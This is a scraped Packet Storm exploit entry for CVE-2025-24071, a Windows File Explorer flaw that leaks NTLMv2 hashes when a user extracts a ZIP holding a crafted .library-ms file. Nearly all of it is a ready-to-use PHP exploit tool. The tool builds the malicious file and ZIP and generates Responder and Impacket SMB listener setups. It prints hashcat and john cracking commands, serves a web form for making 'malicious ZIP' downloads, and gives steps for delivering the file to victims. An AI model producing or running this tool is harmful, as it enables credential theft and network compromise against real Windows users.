{“lastseen”:”2025-12-05T18:53:16″,”description”:”Microsoft Windows File Explorer in Windows 10 and 11 contains a critical NTLM hash disclosure vulnerability that allows attackers to capture user authentication credentials by exploiting the automatic parsing of .library-ms files from ZIP archives,…”,”published”:”2025-12-05T00:00:00″,”modified”:”2025-12-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:212497″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-24071″],”sourceData”:”=============================================================================================================================================\\n | # Title : Windows File Explorer NTLM v2 Hash Disclosure\\n |\\n | # Author : indoushka\\n |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64\\n bits) |\\n | # Vendor : System built\u2011in component.No standalone download available\\n |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/197740\/ \\u0026\\n CVE-2025-24071\\n \\n [+] Summary :\\n Windows File Explorer in Windows 10 and 11 contains a critical\\n NTLM hash disclosure vulnerability that allows attackers to capture user\\n authentication\\n credentials by exploiting the automatic parsing of .library-ms files from\\n ZIP archives, leading to potential domain compromise through credential\\n relay attacks.\\n The vulnerability exists in Windows Explorer’s automatic handling of\\n .library-ms files extracted from ZIP archives. When a user extracts a\\n malicious ZIP file,\\n Explorer automatically attempts to connect to SMB shares specified in the\\n .library-ms file, leaking NTLMv2 hashes to attacker-controlled servers\\n without user interaction.\\n \\n \\n [+] POC :\\n \\n php poc.php\\n \\n \\u003c?php\\n \\n class WindowsNTLMHashDisclosure {\\n \\n private $ip;\\n private $filename;\\n private $output_dir;\\n private $keep_files;\\n \\n public function __construct($ip, $filename = ‘malicious’, $output_dir =\\n ‘output’, $keep_files = false) {\\n $this-\\u003eip = $ip;\\n $this-\\u003efilename = $filename;\\n $this-\\u003eoutput_dir = rtrim($output_dir, ‘\/’);\\n $this-\\u003ekeep_files = $keep_files;\\n }\\n \\n public function banner() {\\n echo \\”==================================================\\\\n\\”;\\n echo \\” Windows File Explorer NTLM Hash Disclosure\\\\n\\”;\\n echo \\” CVE-2025-24071 Exploit Tool\\\\n\\”;\\n echo \\” Author: indoushka (PHP Port)\\\\n\\”;\\n echo \\”==================================================\\\\n\\\\n\\”;\\n }\\n \\n public function create_library_ms() {\\n $payload = \\u003c\\u003c\\u003cXML\\n \\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\”?\\u003e\\n \\u003clibraryDescription xmlns=\\”http:\/\/schemas.microsoft.com\/windows\/2009\/library\\n \\”\\u003e\\n \\u003csearchConnectorDescriptionList\\u003e\\n \\u003csearchConnectorDescription\\u003e\\n \\u003csimpleLocation\\u003e\\n \\u003curl\\u003e\\\\\\\\\\\\\\\\{$this-\\u003eip}\\\\\\\\shared\\u003c\/url\\u003e\\n \\u003c\/simpleLocation\\u003e\\n \\u003c\/searchConnectorDescription\\u003e\\n \\u003c\/searchConnectorDescriptionList\\u003e\\n \\u003c\/libraryDescription\\u003e\\n XML;\\n \\n $library_file = $this-\\u003eoutput_dir . ‘\/’ . $this-\\u003efilename .\\n ‘.library-ms’;\\n \\n if (!file_put_contents($library_file, $payload)) {\\n throw new Exception(\\”Failed to create .library-ms file\\”);\\n }\\n \\n echo \\”[+] Created malicious .library-ms file: {$library_file}\\\\n\\”;\\n return $library_file;\\n }\\n \\n public function build_zip($library_file) {\\n $zip_file = $this-\\u003eoutput_dir . ‘\/’ . $this-\\u003efilename . ‘.zip’;\\n \\n $zip = new ZipArchive();\\n if ($zip-\\u003eopen($zip_file, ZipArchive::CREATE |\\n ZipArchive::OVERWRITE) !== TRUE) {\\n throw new Exception(\\”Cannot create ZIP file: {$zip_file}\\”);\\n }\\n \\n $zip-\\u003eaddFile($library_file, basename($library_file));\\n $zip-\\u003eclose();\\n \\n echo \\”[+] Created ZIP archive: {$zip_file}\\\\n\\”;\\n return $zip_file;\\n }\\n \\n public function exploit() {\\n $this-\\u003ebanner();\\n \\n echo \\”[*] Target SMB Server: {$this-\\u003eip}\\\\n\\”;\\n echo \\”[*] Output Directory: {$this-\\u003eoutput_dir}\\\\n\\”;\\n echo \\”[*] Base Filename: {$this-\\u003efilename}\\\\n\\\\n\\”;\\n \\n \/\/ Create output directory\\n if (!is_dir($this-\\u003eoutput_dir)) {\\n if (!mkdir($this-\\u003eoutput_dir, 0755, true)) {\\n throw new Exception(\\”Failed to create output directory:\\n {$this-\\u003eoutput_dir}\\”);\\n }\\n }\\n \\n \/\/ Create malicious .library-ms file\\n $library_file = $this-\\u003ecreate_library_ms();\\n \\n \/\/ Package into ZIP\\n $zip_file = $this-\\u003ebuild_zip($library_file);\\n \\n \/\/ Clean up if not keeping files\\n if (!$this-\\u003ekeep_files \\u0026\\u0026 file_exists($library_file)) {\\n unlink($library_file);\\n echo \\”[-] Removed intermediate .library-ms file\\\\n\\”;\\n }\\n \\n $this-\\u003edisplay_instructions($zip_file);\\n \\n return $zip_file;\\n }\\n \\n private function display_instructions($zip_file) {\\n echo \\”\\\\n\\” . str_repeat(\\”=\\”, 60) . \\”\\\\n\\”;\\n echo \\” EXPLOITATION INSTRUCTIONS\\\\n\\”;\\n echo str_repeat(\\”=\\”, 60) . \\”\\\\n\\”;\\n echo \\”1. Start SMB listener on {$this-\\u003eip}:\\\\n\\”;\\n echo \\” – Using Responder: responder -I eth0 -wrf\\\\n\\”;\\n echo \\” – Using Impacket: smbserver.py SHARE \/tmp\/smb\\n -smb2support\\\\n\\”;\\n echo \\”\\\\n2. Deliver ZIP file to victim:\\\\n\\”;\\n echo \\” – File: {$zip_file}\\\\n\\”;\\n echo \\” – Methods: Email, USB, Network share, etc.\\\\n\\”;\\n echo \\”\\\\n3. When victim extracts ZIP, Windows Explorer will:\\\\n\\”;\\n echo \\” – Automatically parse .library-ms file\\\\n\\”;\\n echo \\” – Attempt SMB connection to {$this-\\u003eip}\\\\n\\”;\\n echo \\” – Leak NTLMv2 hash to your SMB server\\\\n\\”;\\n echo \\”\\\\n4. Crack the captured hash:\\\\n\\”;\\n echo \\” – Use hashcat: hashcat -m 5600 hash.txt wordlist.txt\\\\n\\”;\\n echo \\” – Use john: john –format=netntlmv2 hash.txt\\\\n\\”;\\n echo str_repeat(\\”=\\”, 60) . \\”\\\\n\\”;\\n }\\n \\n public static function is_valid_ip($ip) {\\n return filter_var($ip, FILTER_VALIDATE_IP) !== false;\\n }\\n \\n public function get_file_paths() {\\n return [\\n ‘library_ms’ =\\u003e $this-\\u003eoutput_dir . ‘\/’ . $this-\\u003efilename .\\n ‘.library-ms’,\\n ‘zip’ =\\u003e $this-\\u003eoutput_dir . ‘\/’ . $this-\\u003efilename . ‘.zip’\\n ];\\n }\\n }\\n \\n class SMBListenerHelper {\\n \\n public static function generate_responder_config($ip) {\\n $config = \\u003c\\u003c\\u003cCONFIG\\n ; Responder Configuration for CVE-2025-24071\\n ; Save as responder.conf\\n \\n [Responder Core]\\n SQL = On\\n SMB = On\\n Kerberos = On\\n FTP = On\\n POP = On\\n SMTP = On\\n IMAP = On\\n HTTP = On\\n HTTPS = On\\n DNS = On\\n LDAP = On\\n \\n ; Network interface\\n Interface = eth0\\n \\n ; Specific IP to listen on\\n BindIP = {$ip}\\n \\n ; Analysis mode (optional)\\n Analyze = On\\n CONFIG;\\n \\n return $config;\\n }\\n \\n public static function generate_smbserver_script() {\\n $script = \\u003c\\u003c\\u003cPYTHON\\n #!\/usr\/bin\/env python3\\n # Impacket SMB Server for CVE-2025-24071\\n \\n from impacket import smbserver\\n from impacket.ntlm import compute_lmhash, compute_nthash\\n import argparse\\n import threading\\n import sys\\n \\n class CVE202524071Server:\\n def __init__(self, listen_address, share_path):\\n self.server = smbserver.SimpleSMBServer(listen_address,\\n listen_address, 445)\\n self.server.addShare(\\”SHARE\\”, share_path)\\n \\n def start(self):\\n print(\\”[*] Starting SMB server for CVE-2025-24071\\”)\\n print(\\”[*] Waiting for NTLM hash leakage…\\”)\\n self.server.start()\\n \\n if __name__ == \\”__main__\\”:\\n parser = argparse.ArgumentParser()\\n parser.add_argument(\\”–ip\\”, required=True, help=\\”IP to listen on\\”)\\n parser.add_argument(\\”–share\\”, default=\\”\/tmp\/smb\\”, help=\\”Share path\\”)\\n args = parser.parse_args()\\n \\n server = CVE202524071Server(args.ip, args.share)\\n server.start()\\n PYTHON;\\n \\n return $script;\\n }\\n }\\n \\n class HashCrackingHelper {\\n \\n public static function display_cracking_commands($hash_file =\\n ‘captured_hashes.txt’) {\\n $commands = [\\n ‘hashcat’ =\\u003e \\”hashcat -m 5600 {$hash_file}\\n \/usr\/share\/wordlists\/rockyou.txt\\”,\\n ‘john’ =\\u003e \\”john –format=netntlmv2 {$hash_file}\\”,\\n ‘online_crack’ =\\u003e \\”Use online services like crackstation.net or\\n hashes.com\\”\\n ];\\n \\n echo \\”\\\\n\\” . str_repeat(\\”=\\”, 50) . \\”\\\\n\\”;\\n echo \\” HASH CRACKING COMMANDS\\\\n\\”;\\n echo str_repeat(\\”=\\”, 50) . \\”\\\\n\\”;\\n \\n foreach ($commands as $tool =\\u003e $command) {\\n echo \\”{$tool}: {$command}\\\\n\\”;\\n }\\n echo str_repeat(\\”=\\”, 50) . \\”\\\\n\\”;\\n }\\n \\n public static function generate_hash_example() {\\n $example = \\u003c\\u003c\\u003cHASH\\n Example NTLMv2 Hash Format:\\n username::domain:challenge:HMAC-MD5:blob\\n \\n Actual captured hash will look like:\\n Administrator::WIN11:1122334455667788:8846F7EAEE8FB117AD06BDD830B7586C:01010000000000000090D336F74CD801B8B5E9545C96D79F000000000200080053004D004200330001001E00570049004E002D0034004300520038004100330056004A0037004B00420004003400570049004E002D0034004300520038004100330056004A0037004B0042002E0053004D00420033002E004C004F00430041004C000300140053004D00420033002E004C004F00430041004C000500140053004D00420033002E004C004F00430041004C00070008000090D336F74CD8010600040002000000080030003000000000000000010000000020000006DE67E84DC5A62919F4D6F6A8F6F6D6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D0A001000000000000000000000000000000000000000900200063006900660073002F003100390032002E003100360038002E0031002E003100300030000000000000000000\\n HASH;\\n \\n return $example;\\n }\\n }\\n \\n \/\/ Command line interface\\n if (php_sapi_name() === ‘cli’ \\u0026\\u0026 isset($argv[0]) \\u0026\\u0026 basename($argv[0]) ===\\n basename(__FILE__)) {\\n \\n if ($argc \\u003c 2) {\\n echo \\”Windows File Explorer NTLM Hash Disclosure\\n (CVE-2025-24071)\\\\n\\”;\\n echo\\n \\”===========================================================\\\\n\\”;\\n echo \\”Usage: php \\” . $argv[0] . \\” \\u003cattacker_ip\\u003e [options]\\\\n\\”;\\n echo \\”Example: php \\” . $argv[0] . \\” 192.168.1.100\\\\n\\”;\\n echo \\”Example: php \\” . $argv[0] . \\” 192.168.1.100 -n payroll -o\\n .\/malicious_zips –keep\\\\n\\”;\\n echo \\”\\\\nOptions:\\\\n\\”;\\n echo \\” -n, –name Base filename (default: malicious)\\\\n\\”;\\n echo \\” -o, –output Output directory (default: .\/output)\\\\n\\”;\\n echo \\” -k, –keep Keep .library-ms file after ZIP creation\\\\n\\”;\\n echo \\” –smb-help Show SMB listener setup help\\\\n\\”;\\n echo \\” –crack-help Show hash cracking instructions\\\\n\\”;\\n exit(1);\\n }\\n \\n $ip = $argv[1];\\n $filename = ‘malicious’;\\n $output_dir = ‘output’;\\n $keep_files = false;\\n \\n \/\/ Parse command line options\\n for ($i = 2; $i \\u003c $argc; $i++) {\\n switch ($argv[$i]) {\\n case ‘-n’:\\n case ‘–name’:\\n $filename = $argv[++$i];\\n break;\\n case ‘-o’:\\n case ‘–output’:\\n $output_dir = $argv[++$i];\\n break;\\n case ‘-k’:\\n case ‘–keep’:\\n $keep_files = true;\\n break;\\n case ‘–smb-help’:\\n echo\\n SMBListenerHelper::generate_responder_config(‘192.168.1.100’);\\n echo \\”\\\\n\\\\n\\”;\\n echo SMBListenerHelper::generate_smbserver_script();\\n exit(0);\\n case ‘–crack-help’:\\n HashCrackingHelper::display_cracking_commands();\\n echo \\”\\\\n\\” . HashCrackingHelper::generate_hash_example() .\\n \\”\\\\n\\”;\\n exit(0);\\n }\\n }\\n \\n try {\\n if (!WindowsNTLMHashDisclosure::is_valid_ip($ip)) {\\n echo \\”[-] Invalid IP address: {$ip}\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new WindowsNTLMHashDisclosure($ip, $filename,\\n $output_dir, $keep_files);\\n $zip_file = $exploit-\\u003eexploit();\\n \\n echo \\”\\\\n[+] Exploit files created successfully!\\\\n\\”;\\n echo \\”[+] Deliver this file to the victim: {$zip_file}\\\\n\\”;\\n \\n } catch (Exception $e) {\\n echo \\”[-] Error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n \/\/ Web interface for the exploit\\n if (isset($_GET[‘web’]) \\u0026\\u0026 $_GET[‘web’] === ‘true’) {\\n ?\\u003e\\n \\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eCVE-2025-24071 – NTLM Hash Disclosure\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n body { font-family: Arial, sans-serif; margin: 40px;\\n background: #f0f0f0; }\\n .container { max-width: 900px; margin: 0 auto; background:\\n white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px\\n rgba(0,0,0,0.1); }\\n h1 { color: #d32f2f; border-bottom: 2px solid #d32f2f;\\n padding-bottom: 10px; }\\n .form-group { margin: 20px 0; }\\n label { display: block; margin-bottom: 5px; font-weight: bold;\\n color: #333; }\\n input[type=\\”text\\”] { padding: 10px; width: 300px; border: 1px\\n solid #ddd; border-radius: 4px; }\\n button { background: #d32f2f; color: white; padding: 12px 25px;\\n border: none; border-radius: 4px; cursor: pointer; font-size: 16px; }\\n button:hover { background: #b71c1c; }\\n .output { background: #f8f8f8; padding: 15px; border-radius:\\n 4px; margin: 20px 0; white-space: pre-wrap; font-family: monospace; }\\n .success { color: #388e3c; font-weight: bold; }\\n .error { color: #d32f2f; font-weight: bold; }\\n .info-box { background: #e3f2fd; padding: 15px; border-radius:\\n 4px; margin: 15px 0; }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003eCVE-2025-24071 – Windows NTLM Hash Disclosure\\u003c\/h1\\u003e\\n \\n \\u003c?php\\n if ($_POST[‘generate’] ?? false) {\\n $ip = $_POST[‘ip’] ?? ”;\\n $filename = $_POST[‘filename’] ?? ‘malicious’;\\n $keep_files = isset($_POST[‘keep_files’]);\\n \\n if (!empty($ip)) {\\n echo ‘\\u003cdiv class=\\”output\\”\\u003e’;\\n try {\\n $exploit = new WindowsNTLMHashDisclosure($ip,\\n $filename, ‘web_output’, $keep_files);\\n $zip_file = $exploit-\\u003eexploit();\\n \\n $file_paths = $exploit-\\u003eget_file_paths();\\n if (file_exists($file_paths[‘zip’])) {\\n $file_url = ‘web_output\/’ .\\n basename($file_paths[‘zip’]);\\n echo ‘\\u003cp class=\\”success\\”\\u003eZIP file generated\\n successfully!\\u003c\/p\\u003e’;\\n echo ‘\\u003cp\\u003e\\u003ca href=\\”‘ . $file_url . ‘\\”\\n download\\u003eDownload Malicious ZIP File\\u003c\/a\\u003e\\u003c\/p\\u003e’;\\n }\\n } catch (Exception $e) {\\n echo ‘\\u003cp class=\\”error\\”\\u003eError: ‘ . $e-\\u003egetMessage()\\n . ‘\\u003c\/p\\u003e’;\\n }\\n echo ‘\\u003c\/div\\u003e’;\\n }\\n }\\n ?\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”ip\\”\\u003eYour SMB Server IP:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”ip\\” name=\\”ip\\”\\n placeholder=\\”192.168.1.100\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”filename\\”\\u003eZIP Filename:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”filename\\” name=\\”filename\\”\\n value=\\”malicious\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel\\u003e\\n \\u003cinput type=\\”checkbox\\” name=\\”keep_files\\” value=\\”1\\”\\u003e\\n Keep .library-ms file (for analysis)\\n \\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” name=\\”generate\\”\\u003eGenerate Malicious\\n ZIP\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv class=\\”info-box\\”\\u003e\\n \\u003ch3\\u003eAbout CVE-2025-24071:\\u003c\/h3\\u003e\\n \\u003cp\\u003eThis vulnerability affects Windows File Explorer in\\n Windows 10\/11. When a user extracts a ZIP file containing a malicious\\n .library-ms file, Windows Explorer automatically attempts to connect to an\\n SMB server specified in the file, leaking the user’s NTLMv2 hash.\\u003c\/p\\u003e\\n \\n \\u003ch3\\u003eExploitation Steps:\\u003c\/h3\\u003e\\n \\u003col\\u003e\\n \\u003cli\\u003eSet up SMB listener on your server\\u003c\/li\\u003e\\n \\u003cli\\u003eGenerate malicious ZIP using this tool\\u003c\/li\\u003e\\n \\u003cli\\u003eDeliver ZIP to target user\\u003c\/li\\u003e\\n \\u003cli\\u003eCapture NTLM hash when they extract the file\\u003c\/li\\u003e\\n \\u003cli\\u003eCrack the hash to obtain credentials\\u003c\/li\\u003e\\n \\u003c\/ol\\u003e\\n \\n \\u003cp\\u003e\\u003cstrong\\u003eNote:\\u003c\/strong\\u003e This tool is for educational and\\n authorized testing purposes only.\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\u003c?php\\n exit;\\n }\\n \\n ?\\u003e\\n \\n \\n \\n Greetings to\\n :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln\\n (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212497″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212497\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-05T18:53:16″,”description”:”Microsoft Windows File Explorer in Windows 10 and 11 contains a critical NTLM hash disclosure vulnerability that allows attackers to capture user authentication credentials by…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-28896","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n